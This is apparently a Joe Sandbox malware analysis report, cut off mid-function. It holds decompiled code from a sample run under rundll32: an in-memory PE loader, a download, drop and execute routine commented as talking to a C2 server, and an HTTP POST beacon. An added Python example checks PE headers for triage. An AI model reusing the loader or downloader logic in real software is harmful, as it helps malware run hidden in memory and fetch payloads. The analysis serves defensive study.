    execution_graph 1264 118157a 1265 1181688 1264->1265 1266 118169f 1265->1266 1267 1181693 SetLastError 1265->1267 1267->1266 973 1182690 976 1181000 973->976 979 1181030 LoadLibraryW GetProcAddress 976->979 1021 1181b30 979->1021 982 1181091 SetLastError 1015 118102b 982->1015 983 11810a3 984 1181b30 SetLastError 983->984 985 11810b9 984->985 986 11810de SetLastError 985->986 987 11810f0 985->987 985->1015 986->1015 988 11810ff SetLastError 987->988 989 1181111 987->989 988->1015 990 118111c SetLastError 989->990 992 118112e GetNativeSystemInfo 989->992 990->1015 993 11811bc 992->993 994 11811e9 993->994 995 11811d7 SetLastError 993->995 1024 1181800 VirtualAlloc 994->1024 995->1015 996 1181202 997 118123d GetProcessHeap RtlAllocateHeap 996->997 1025 1181800 VirtualAlloc 996->1025 998 118127b 997->998 999 1181257 SetLastError 997->999 1003 1181b30 SetLastError 998->1003 999->1015 1000 1181222 1000->997 1001 118122e SetLastError 1000->1001 1001->1015 1004 11812fb 1003->1004 1005 1181302 1004->1005 1026 1181800 VirtualAlloc 1004->1026 1057 11816c0 1005->1057 1006 1181320 1027 1181b50 1006->1027 1009 118136b 1009->1005 1033 11821a0 1009->1033 1013 11813ca 1013->1005 1014 11813eb 1013->1014 1014->1015 1016 11813ff GetPEB 1014->1016 1052 1191000 1016->1052 1022 1181b3b SetLastError 1021->1022 1023 1181070 1021->1023 1022->1023 1023->982 1023->983 1023->1015 1024->996 1025->1000 1026->1006 1031 1181b7d 1027->1031 1028 1181b30 SetLastError 1029 1181c32 1028->1029 1030 1181be9 1029->1030 1065 1181800 VirtualAlloc 1029->1065 1030->1009 1031->1028 1031->1030 1034 11821dd IsBadHugeReadPtr 1033->1034 1043 11813b5 1033->1043 1036 1182207 1034->1036 1034->1043 1037 1182239 SetLastError 1036->1037 1038 118224d 1036->1038 1036->1043 1037->1043 1066 1181a20 1038->1066 1041 1182273 SetLastError 1041->1043 1043->1005 1046 1181e80 1043->1046 1044 118229d 1044->1043 1045 11823ae SetLastError 1044->1045 1045->1043 1047 1181eba 1046->1047 1048 1181fe5 1047->1048 1050 1181fc1 
1047->1050 1081 1181d10 1047->1081 1049 1181d10 2 API calls 1048->1049 1049->1050 1050->1013 1089 1191f70 1052->1089 1058 11816d2 1057->1058 1059 11816d7 1057->1059 1058->1015 1060 11819d0 VirtualFree 1059->1060 1064 118170b 1060->1064 1061 1181770 GetProcessHeap HeapFree 1061->1058 1063 11819d0 VirtualFree 1063->1061 1064->1061 1064->1063 1065->1030 1067 1181a35 1066->1067 1068 1181a2c 1066->1068 1072 1181a43 1067->1072 1074 11819f0 VirtualAlloc 1067->1074 1075 1181900 1068->1075 1071 1181a51 1071->1072 1078 11819d0 1071->1078 1072->1041 1072->1044 1074->1071 1076 1181910 VirtualQuery 1075->1076 1077 118190c 1075->1077 1076->1077 1077->1067 1079 11819d9 VirtualFree 1078->1079 1080 11819ea 1078->1080 1079->1080 1080->1072 1082 1181d29 1081->1082 1086 1181d1f 1081->1086 1083 1181d37 1082->1083 1084 1181d9d VirtualProtect 1082->1084 1083->1086 1088 1181820 VirtualFree 1083->1088 1084->1086 1086->1047 1088->1086 1104 1191b50 1089->1104 1092 1191fa0 1093 1191fe5 1092->1093 1094 1191fd6 SetLastError 1092->1094 1095 1192002 SetLastError 1093->1095 1096 1192011 1093->1096 1102 1191039 1094->1102 1095->1102 1097 1192023 1096->1097 1103 1192060 1096->1103 1098 1192037 SetLastError 1097->1098 1099 1192046 1097->1099 1098->1102 1101 11920f8 SetLastError 1099->1101 1099->1102 1100 11920e1 SetLastError 1100->1102 1101->1102 1102->1015 1103->1099 1103->1100 1141 1191270 1104->1141 1107 1191025 1107->1092 1108 1191b93 SetLastError 1108->1107 1109 1191ba5 1110 1191270 SetLastError 1109->1110 1111 1191bbe 1110->1111 1111->1107 1112 1191be0 SetLastError 1111->1112 1113 1191bf2 1111->1113 1112->1107 1114 1191c01 SetLastError 1113->1114 1115 1191c13 1113->1115 1114->1107 1116 1191c1e SetLastError 1115->1116 1118 1191c30 GetNativeSystemInfo 1115->1118 1116->1107 1119 1191ce4 SetLastError 1118->1119 1120 1191cf6 VirtualAlloc 1118->1120 1119->1107 1121 1191d42 GetProcessHeap HeapAlloc 1120->1121 1122 1191d17 VirtualAlloc 1120->1122 1124 1191d7c 1121->1124 1125 1191d5c VirtualFree 

    Callgraph


    Executed Functions

    Control-flow Graph

    APIs
    • LoadLibraryW.KERNEL32(01184054,01184040), ref: 01181047
    • GetProcAddress.KERNEL32(00000000), ref: 0118104E
      • Part of subcall function 01181B30: SetLastError.KERNEL32(0000000D,?,01181070,?,00000040), ref: 01181B3D
    • SetLastError.KERNEL32(000000C1), ref: 01181096
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$AddressLibraryLoadProc
    • String ID:
    • API String ID: 1866314245-0
    • Opcode ID: bc7fecdde333443b587c1bc15acf54aaa0c8361fd18ddd9da41475fe1ac0b0b6
    • Instruction ID: e5b58642e1bfa95848f5ec43f5a5df693ed3134dc2ffa1a10c09974a08779cbb
    • Opcode Fuzzy Hash: bc7fecdde333443b587c1bc15acf54aaa0c8361fd18ddd9da41475fe1ac0b0b6
    • Instruction Fuzzy Hash: 0AF1D9B5A00209EFDB08DF98D994AAEB7B1FF48304F208558E915AB341D775EE42CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E011B11A0() {
    				struct HINSTANCE__* _v8;
    				struct HINSTANCE__* _v12;
    				void* _t32;
    				void* _t40;
    
    				// Runtime import resolution: the module resolves the APIs it needs by name and stores
    				// the pointers in a global table (0x11b3008..0x11b3030), so its real API usage is
    				// invisible in the static import directory and is only seen by resolving GetProcAddress calls.
    				_v8 = LoadLibraryA("msvcrt.dll");
    				_v12 = LoadLibraryA("kernel32.dll");
    				 *0x11b3010 = GetProcAddress(_v8, "realloc");
    				 *0x11b3020 = GetProcAddress(_v8, "exit");     // called with 1 by E011B10B0 when the C2 reply is unusable
    				 *0x11b3024 = GetProcAddress(_v8, "strncmp");
    				 *0x11b3008 = GetProcAddress(_v8, "free");
    				 *0x11b300c = GetProcAddress(_v8, "malloc");
    				 *0x11b3014 = GetProcAddress(_v12, "CreateDirectoryA"); // E011B1040 creates the drop directory with it
    				 *0x11b3018 = GetProcAddress(_v12, "CreateProcessA");   // launcher for the dropped file; E011B12B0 is the likely caller
    				 *0x11b301c = GetProcAddress(_v12, "DeleteFileA");
    				 *0x11b3028 = GetProcAddress(_v8, "memset");
    				 *0x11b3030 = GetProcAddress(_v8, "memcpy");
    				 *0x11b302c = GetProcAddress(_v8, "strstr"); // executed
    				E011B1040(); // executed: CreateDirectoryA (see the subcall entry below)
    				_t32 = E011B10B0(_t40); // executed: the download, drop and execute routine
    				return _t32;
    			}


    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 011B11AB
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 011B11B9
    • GetProcAddress.KERNEL32(00000001,realloc), ref: 011B11CB
    • GetProcAddress.KERNEL32(00000001,exit), ref: 011B11DF
    • GetProcAddress.KERNEL32(00000001,strncmp), ref: 011B11F3
    • GetProcAddress.KERNEL32(00000001,free), ref: 011B1207
    • GetProcAddress.KERNEL32(00000001,malloc), ref: 011B121B
    • GetProcAddress.KERNEL32(?,CreateDirectoryA), ref: 011B122F
    • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 011B1243
    • GetProcAddress.KERNEL32(?,DeleteFileA), ref: 011B1257
    • GetProcAddress.KERNEL32(00000001,memset), ref: 011B126B
    • GetProcAddress.KERNEL32(00000001,memcpy), ref: 011B127F
    • GetProcAddress.KERNEL32(00000001,strstr), ref: 011B1293
      • Part of subcall function 011B1040: CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,011B12A3), ref: 011B108A
      • Part of subcall function 011B10B0: Sleep.KERNEL32(00003A98), ref: 011B1166
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateDirectorySleep
    • String ID: CreateDirectoryA$CreateProcessA$DeleteFileA$exit$free$kernel32.dll$malloc$memcpy$memset$msvcrt.dll$realloc$strncmp$strstr
    • API String ID: 2158191583-3107153655
    • Opcode ID: e1c7a0048707f8ab3940969266d7ec65be425d58be735c8baeec0068421cb345
    • Instruction ID: cac8be6125ccedb07fccc3ab99c45f468b5b45ec2eeacaec7818c7329323f8e4
    • Opcode Fuzzy Hash: e1c7a0048707f8ab3940969266d7ec65be425d58be735c8baeec0068421cb345
    • Instruction Fuzzy Hash: 8621D4B8950304FFC73CDFA2D9C99AD7B76FB486017100969FD3196204D7746998EB60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 90%
    			E01191B50(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
    				void* _v8;
    				intOrPtr* _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed short* _v28;
    				void* _v32;
    				void* _v36;
    				void* _v40;
    				long _v44;
    				void* _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v100;
    				char _v104;
    				void* _t184;
    				void* _t195;
    				void* _t202;
    				void* _t205;
    				void* _t206;
    				void* _t223;
    				intOrPtr _t320;
    
    				_v20 = __ecx;
    				_v8 = 0;
    				_v40 = 0;
    				if(E01191270(_v20, _a8, 0x40) != 0) { // size check: at least a DOS header; E01191270 sets 0xd (ERROR_INVALID_DATA) on failure
    					_v28 = _a4;
    					if(( *_v28 & 0x0000ffff) == 0x5a4d) { // e_magic == "MZ"
    						if(E01191270(_v20, _a8, _v28[0x1e] + 0xf8) != 0) { // e_lfanew + sizeof(IMAGE_NT_HEADERS32) must fit
    							_v12 = _a4 + _v28[0x1e]; // IMAGE_NT_HEADERS32
    							if( *_v12 == 0x4550) { // Signature == "PE\0\0"
    								_t19 = _v12 + 4; // 0x3; FileHeader.Machine
    								if(( *_t19 & 0x0000ffff) == 0x14c) { // IMAGE_FILE_MACHINE_I386: 32-bit images only
    									_t21 = _v12 + 0x38; // 0x0; OptionalHeader.SectionAlignment
    									if(( *_t21 & 0x00000001) == 0) { // an odd SectionAlignment is rejected as ERROR_BAD_EXE_FORMAT
    										_t23 = _v12 + 0x14; // 0x0; FileHeader.SizeOfOptionalHeader
    										_t26 = ( *_t23 & 0x0000ffff) + 0x18; // 0x1194018
    										_v24 = _v12 + _t26; // first IMAGE_SECTION_HEADER
    										_t29 = _v12 + 0x38; // 0x0
    										_v60 =  *_t29; // SectionAlignment, used as the size of a section that has no raw data
    										_v32 = 0; // section index; _v40 tracks the highest section end seen
    										while(1) {
    											_t37 = _v12 + 6; // 0x40000
    											if(_v32 >= ( *_t37 & 0x0000ffff)) {
    												break;
    											}
    											if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
    												_v36 =  *((intOrPtr*)(_v24 + 0xc)) +  *((intOrPtr*)(_v24 + 0x10));
    											} else {
    												_v36 =  *((intOrPtr*)(_v24 + 0xc)) + _v60;
    											}
    											if(_v36 > _v40) {
    												_v40 = _v36;
    											}
    											_v32 = _v32 + 1;
    											_v24 = _v24 + 0x28;
    										}
    										__imp__GetNativeSystemInfo( &_v104); // executed; _v100 is SYSTEM_INFO.dwPageSize
    										_t56 = _v12 + 0x50; // 0x70207369; OptionalHeader.SizeOfImage
    										_t59 = _v100 - 1; // 0x70207368
    										_v44 =  *_t56 + _t59 &  !(_v100 - 1); // SizeOfImage rounded up to a page
    										_t65 = _v100 - 1; // -1
    										if(_v44 == (_v40 + _t65 &  !(_v100 - 1))) { // must equal the page-rounded end of the last section, else ERROR_BAD_EXE_FORMAT
    											_t70 = _v12 + 0x34; // 0x0; OptionalHeader.ImageBase
    											_t184 = VirtualAlloc( *_t70, _v44, 0x3000, 4); // executed: MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE, first try at the preferred base
    											_v16 = _t184;
    											if(_v16 != 0) {
    												L26:
    												_v8 = HeapAlloc(GetProcessHeap(), 8, 0x34); // HEAP_ZERO_MEMORY; the loader's state record
    												if(_v8 != 0) {
    													 *((intOrPtr*)(_v8 + 4)) = _v16; // code base of the mapped image
    													_t83 = _v12 + 0x16; // 0x400000; FileHeader.Characteristics
    													if(( *_t83 & 0x2000) == 0) { // IMAGE_FILE_DLL
    														_v48 = 0;
    													} else {
    														_v48 = 1;
    													}
    													 *(_v8 + 0x14) = _v48; // isDLL
    													 *((intOrPtr*)(_v8 + 0x1c)) = _a12; // loadLibrary callback, used by E011918C0
    													 *((intOrPtr*)(_v8 + 0x20)) = _a16; // getProcAddress callback
    													 *((intOrPtr*)(_v8 + 0x24)) = _a20; // freeLibrary callback, used on the import failure path
    													 *((intOrPtr*)(_v8 + 0x28)) = _a24; // opaque value passed as the last argument to each callback
    													 *((intOrPtr*)(_v8 + 0x30)) = _v100; // page size
    													_t105 = _v12 + 0x54; // 0x72676f72; OptionalHeader.SizeOfHeaders
    													if(E01191270(_v20, _a8,  *_t105) != 0) {
    														_t109 = _v12 + 0x54; // 0x72676f72
    														_t195 = VirtualAlloc(_v16,  *_t109, 0x1000, 4); // executed: commit the header pages (MEM_COMMIT, PAGE_READWRITE)
    														_v52 = _t195;
    														_t113 = _v12 + 0x54; // 0x72676f72
    														E011910D0(_v52, _v28,  *_t113); // copy the headers into the mapped image
    														 *_v8 = _v52 + _v28[0x1e]; // NT headers inside the new image
    														 *((intOrPtr*)( *_v8 + 0x34)) = _v16; // rewrite ImageBase to the base actually obtained
    														_t202 = E011912A0(_v20, _a4, _a8, _v12, _v8); // executed: copy the sections (VirtualAlloc per section)
    														if(_t202 != 0) {
    															_t131 = _v12 + 0x34; // 0x0
    															_t320 =  *((intOrPtr*)( *_v8 + 0x34)) -  *_t131; // load delta: actual base minus preferred ImageBase
    															_v56 = _t320;
    															if(_t320 == 0) {
    																 *((intOrPtr*)(_v8 + 0x18)) = 1; // loaded at the preferred base, nothing to relocate
    															} else {
    																 *((intOrPtr*)(_v8 + 0x18)) = E011917B0(_v20, _v8, _v56); // apply base relocations by the delta
    															}
    															_t205 = E011918C0(_v20, _v8); // executed: resolve imports through the callbacks
    															if(_t205 != 0) {
    																_t206 = E011915B0(_v20, _v8); // executed: set final section protections (VirtualProtect via E01191460)
    																if(_t206 != 0) {
    																	if(E01191730(_v20, _v8) != 0) {
    																		if( *((intOrPtr*)( *_v8 + 0x28)) == 0) { // OptionalHeader.AddressOfEntryPoint
    																			 *(_v8 + 0x2c) = 0; // no entry point to run
    																			L52:
    																			return _v8;
    																		}
    																		if( *(_v8 + 0x14) == 0) { // not a DLL: remember the EXE entry point, do not call it here
    																			 *(_v8 + 0x2c) = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
    																			L50:
    																			goto L52;
    																		}
    																		_v64 = _v16 +  *((intOrPtr*)( *_v8 + 0x28)); // DllMain of the mapped module
    																		_v68 = _v64(_v16, 1, 0); // DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)
    																		if(_v68 != 0) {
    																			 *((intOrPtr*)(_v8 + 0x10)) = 1; // initialized
    																			goto L50;
    																		}
    																		SetLastError(0x45a); // ERROR_DLL_INIT_FAILED
    																		goto L53;
    																	}
    																	goto L53;
    																}
    																goto L53;
    															}
    															goto L53;
    														}
    														goto L53;
    													} else {
    														L53:
    														E01192120(_v20, _v8);
    														return 0;
    													}
    												}
    												VirtualFree(_v16, 0, 0x8000); // MEM_RELEASE the mapping when the state record cannot be allocated
    												SetLastError(0xe); // ERROR_OUTOFMEMORY
    												return 0;
    											}
    											_t223 = VirtualAlloc(0, _v44, 0x3000, 4); // executed: preferred base unavailable, let the OS choose (relocation follows)
    											_v16 = _t223;
    											if(_v16 != 0) {
    												goto L26;
    											}
    											SetLastError(0xe); // ERROR_OUTOFMEMORY
    											return 0;
    										}
    										SetLastError(0xc1); // ERROR_BAD_EXE_FORMAT: SizeOfImage disagrees with the section table
    										return 0;
    									}
    									SetLastError(0xc1);
    									return 0;
    								}
    								SetLastError(0xc1);
    								return 0;
    							}
    							SetLastError(0xc1);
    							return 0;
    						}
    						return 0;
    					}
    					SetLastError(0xc1);
    					return 0;
    				}
    				return 0;
    			}
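The function above is an in-memory PE loader. Before it touches VirtualAlloc it validates the DOS and NT headers (MZ, PE\0\0, Machine 0x14c, even SectionAlignment), walks the section table to find the highest section end, rounds both that value and SizeOfImage up to the page size reported by GetNativeSystemInfo, and refuses the image with ERROR_BAD_EXE_FORMAT (0xc1) when the two disagree; the size checks done by E01191270 fail with ERROR_INVALID_DATA (0xd). The checks and error codes match the public MemoryModule loader. The Python below is an added example, not code from the report or from the sample: it replays those header checks on a constructed, headers-only PE32 image. Field offsets are the standard PE32 layout seen in the decompilation (+0x38 SectionAlignment, +0x50 SizeOfImage, +0x54 SizeOfHeaders, 0x28-byte section headers); a 0x1000 page size and the test image's sections and sizes are assumptions for the demonstration.

```python
import struct

# Win32 error codes the loader sets (from the decompiled branches above)
ERROR_INVALID_DATA = 0x0D        # set by the E01191270 size checks
ERROR_BAD_EXE_FORMAT = 0xC1
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_DLL = 0x2000
NT_HEADERS32_SIZE = 0xF8         # 4 (signature) + 20 (file header) + 0xE0 (PE32 optional header)
SECTION_HEADER_SIZE = 0x28


def align_up(value, alignment):
    """Same expression the loader uses: (v + a - 1) & ~(a - 1)."""
    return (value + alignment - 1) & ~(alignment - 1)


def validate_in_memory_image(data, page_size=0x1000):
    """Replay the header checks of E01191B50 on a raw PE32 file image.

    Returns (aligned_image_size, None) when the loader would go on to map the
    image, or (None, win32_error) when it would bail out.
    """
    if len(data) < 0x40:
        return None, ERROR_INVALID_DATA
    if struct.unpack_from("<H", data, 0)[0] != 0x5A4D:              # "MZ"
        return None, ERROR_BAD_EXE_FORMAT
    nt = struct.unpack_from("<I", data, 0x3C)[0]                     # e_lfanew
    if len(data) < nt + NT_HEADERS32_SIZE:
        return None, ERROR_INVALID_DATA
    if struct.unpack_from("<I", data, nt)[0] != 0x4550:              # "PE\0\0"
        return None, ERROR_BAD_EXE_FORMAT
    machine, num_sections = struct.unpack_from("<HH", data, nt + 4)
    if machine != IMAGE_FILE_MACHINE_I386:                           # 32-bit images only
        return None, ERROR_BAD_EXE_FORMAT
    size_of_optional_header = struct.unpack_from("<H", data, nt + 0x14)[0]
    section_alignment = struct.unpack_from("<I", data, nt + 0x38)[0]
    if section_alignment & 1:
        return None, ERROR_BAD_EXE_FORMAT
    size_of_image, size_of_headers = struct.unpack_from("<II", data, nt + 0x50)

    # Highest end of any section; a section without raw data counts SectionAlignment bytes.
    last_section_end = 0
    section = nt + 0x18 + size_of_optional_header
    for _ in range(num_sections):
        virtual_address, size_of_raw_data = struct.unpack_from("<II", data, section + 0xC)
        end = virtual_address + (size_of_raw_data or section_alignment)
        last_section_end = max(last_section_end, end)
        section += SECTION_HEADER_SIZE

    aligned_image_size = align_up(size_of_image, page_size)
    if aligned_image_size != align_up(last_section_end, page_size):
        return None, ERROR_BAD_EXE_FORMAT
    if len(data) < size_of_headers:                                  # the check before the header copy
        return None, ERROR_INVALID_DATA
    return aligned_image_size, None


def build_headers_only_pe32(sections, size_of_image, image_base=0x10000000,
                            section_alignment=0x1000, machine=IMAGE_FILE_MACHINE_I386):
    """Constructed test input: DOS header, PE32 NT headers and a section table, no section data.

    sections is a list of (virtual_address, size_of_raw_data) tuples.
    """
    nt_off = 0x40
    dos_header = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", nt_off)
    file_header = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, 0xE0, IMAGE_FILE_DLL)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0x00, 0x10B)                    # PE32 magic
    struct.pack_into("<I", optional, 0x1C, image_base)               # nt+0x34 ImageBase
    struct.pack_into("<I", optional, 0x20, section_alignment)        # nt+0x38 SectionAlignment
    struct.pack_into("<I", optional, 0x38, size_of_image)            # nt+0x50 SizeOfImage
    size_of_headers = nt_off + NT_HEADERS32_SIZE + SECTION_HEADER_SIZE * len(sections)
    struct.pack_into("<I", optional, 0x3C, size_of_headers)          # nt+0x54 SizeOfHeaders
    struct.pack_into("<I", optional, 0x5C, 16)                       # NumberOfRvaAndSizes
    section_table = b"".join(
        struct.pack("<8sIIII", b".s%d" % i, 0, va, raw, 0) + bytes(16)
        for i, (va, raw) in enumerate(sections)
    )
    return dos_header + b"PE\0\0" + file_header + bytes(optional) + section_table


if __name__ == "__main__":
    image = build_headers_only_pe32([(0x1000, 0x200), (0x2000, 0)], size_of_image=0x3000)
    print(validate_in_memory_image(image))                                  # (0x3000, None)
    print(validate_in_memory_image(image[:0x80]))                           # (None, 0xd)
```

A mismatch between SizeOfImage and the section table is the one structural check a packer that rebuilds headers most often gets wrong, so this is also a cheap triage test for any blob an analyst suspects of being fed to such a loader.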


    APIs
      • Part of subcall function 01191270: SetLastError.KERNEL32(0000000D,?,?,01191B75,01191025,00000040), ref: 01191281
    • SetLastError.KERNEL32(000000C1,01191025,00000040), ref: 01191B98
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 524930e88772bca516f55fe9e8622fc53fafd7190fcb2e9cc98900534de40662
    • Instruction ID: de7cb11d777dd453fb26621f2c0dad7f7d74016afb0a7fba33915e5df6c014b4
    • Opcode Fuzzy Hash: 524930e88772bca516f55fe9e8622fc53fafd7190fcb2e9cc98900534de40662
    • Instruction Fuzzy Hash: BFE1EE74A1020AEFDF08DFA4C994AAEBBB1FF48314F108558E525AB385D730AE85CF55
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • wsprintfA.USER32 ref: 011B173A
    • WSAStartup.WS2_32(00000102,?), ref: 011B174F
    • socket.WS2_32(00000002,00000001,00000006), ref: 011B1766
    • gethostbyname.WS2_32(?), ref: 011B1779
    • htons.WS2_32(?), ref: 011B178D
    • connect.WS2_32(?,?,00000010), ref: 011B17D2
    • send.WS2_32(?,?,?,00000000), ref: 011B1854
    • recv.WS2_32(?,?,00000BB8,00000000), ref: 011B18C1
    Strings
    • ping, xrefs: 011B1657
    • POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s, xrefs: 011B172E
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: Startupconnectgethostbynamehtonsrecvsendsocketwsprintf
    • String ID: POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s$ping
    • API String ID: 1466141387-1232505173
    • Opcode ID: f6978137ba71fcb6e0da756795d20d2b10f24d0e6a1d592e9d42bb51408db726
    • Instruction ID: b02902954f8f0a7703db2175f940490ff7f40911fcc298cdf02437931d0d9165
    • Opcode Fuzzy Hash: f6978137ba71fcb6e0da756795d20d2b10f24d0e6a1d592e9d42bb51408db726
    • Instruction Fuzzy Hash: 79B10374D082A89FDB28CF64DD94BD9B7B5AF48300F0085D9E68DA7285D7B06AC8CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 011821F9
    • SetLastError.KERNEL32(0000007E), ref: 0118223B
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ErrorHugeLastRead
    • String ID:
    • API String ID: 3239643929-0
    • Opcode ID: 3d9eb0e4d81e695243eb890cee7e7cf0c121773a10a378cb9c59f46761b20239
    • Instruction ID: cc5976c75837d3f6cdea84f5ce0ddfe4a88b23af19b9841eb8a16dd7ade0563f
    • Opcode Fuzzy Hash: 3d9eb0e4d81e695243eb890cee7e7cf0c121773a10a378cb9c59f46761b20239
    • Instruction Fuzzy Hash: 3F81AA74A04209EFDB09DF98C894AADBBB1FF48314F24C158E919AB355D734EA81CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 37%
    			E011918C0(intOrPtr __ecx, intOrPtr* _a4) {
    				void* _v8;
    				signed int* _v12;
    				intOrPtr _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _t114;
    				intOrPtr _t117;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				void* _t206;
    				void* _t207;
    
    				_v44 = __ecx;
    				_t3 = _a4 + 4; // 0x3
    				_v16 =  *_t3; // code base of the mapped image (loader state +4)
    				_v28 = 1; // result; cleared on any failure
    				_v32 =  *_a4 + 0xbadc25; // import DataDirectory entry of the mapped headers; the displacement is decompiler output (quality 37%), not the real field offset
    				if( *((intOrPtr*)(_v32 + 4)) != 0) { // DataDirectory.Size: no import table means nothing to resolve
    					_v8 = _v16 +  *_v32; // first IMAGE_IMPORT_DESCRIPTOR (base + VirtualAddress)
    					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) { // stop at the null descriptor (Name == 0)
    						_t21 = _a4 + 0x28; // 0x0; opaque callback argument
    						_t26 = _a4 + 0x1c; // 0x0, executed; loadLibrary callback
    						_t114 =  *((intOrPtr*)( *_t26))(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *_t21); // executed: load the module named by the descriptor
    						_t207 = _t206 + 8;
    						_v24 = _t114;
    						if(_v24 != 0) {
    							_t31 = _a4 + 0xc; // 0xffff
    							_t35 = _a4 + 8; // 0x4
    							_t117 = E01191170( *_t35, 4 +  *_t31 * 4); // executed
    							_t206 = _t207 + 8;
    							_v36 = _t117;
    							if(_v36 != 0) {
    								 *((intOrPtr*)(_a4 + 8)) = _v36;
    								_t48 = _a4 + 0xc; // 0xffff
    								_t50 = _a4 + 8; // 0x4
    								 *((intOrPtr*)( *_t50 +  *_t48 * 4)) = _v24;
    								_t55 = _a4 + 0xc; // 0xffff
    								 *(_a4 + 0xc) =  *_t55 + 1;
    								if( *_v8 == 0) {
    									_v12 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    								} else {
    									_v12 = _v16 +  *_v8;
    									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    								}
    								while( *_v12 != 0) { // _v12 walks the lookup table (INT, or the IAT when there is no INT); _v20 is the IAT slot being filled
    									if(( *_v12 & 0x80000000) == 0) {
    										_v40 = _v16 +  *_v12; // IMAGE_IMPORT_BY_NAME
    										_t91 = _a4 + 0x28; // 0x0
    										_t95 = _a4 + 0x20; // 0x0; getProcAddress callback
    										_t135 =  *((intOrPtr*)( *_t95))(_v24, _v40 + 2,  *_t91); // by name: +2 skips the Hint field
    										_t206 = _t206 + 0xc;
    										 *_v20 = _t135;
    									} else {
    										_t81 = _a4 + 0x28; // 0x0
    										_t85 = _a4 + 0x20; // 0x0
    										_t140 =  *((intOrPtr*)( *_t85))(_v24,  *_v12 & 0x0000ffff,  *_t81); // by ordinal (IMAGE_ORDINAL_FLAG32 set)
    										_t206 = _t206 + 0xc;
    										 *_v20 = _t140;
    									}
    									if( *_v20 != 0) {
    										_v12 =  &(_v12[1]);
    										_v20 = _v20 + 4;
    										continue;
    									} else {
    										_v28 = 0;
    										break;
    									}
    								}
    								if(_v28 != 0) {
    									_v8 = _v8 + 0x14;
    									continue;
    								}
    								_t101 = _a4 + 0x28; // 0x0
    								_t104 = _a4 + 0x24; // 0x0; freeLibrary callback
    								 *((intOrPtr*)( *_t104))(_v24,  *_t101);
    								SetLastError(0x7f); // ERROR_PROC_NOT_FOUND: an import could not be resolved
    								break;
    							}
    							_t39 = _a4 + 0x28; // 0x0
    							_t42 = _a4 + 0x24; // 0x0
    							 *((intOrPtr*)( *_t42))(_v24,  *_t39); // release the module just loaded
    							SetLastError(0xe); // ERROR_OUTOFMEMORY: growing the loaded-module array failed
    							_v28 = 0;
    							break;
    						}
    						SetLastError(0x7e); // ERROR_MOD_NOT_FOUND: the loadLibrary callback returned NULL
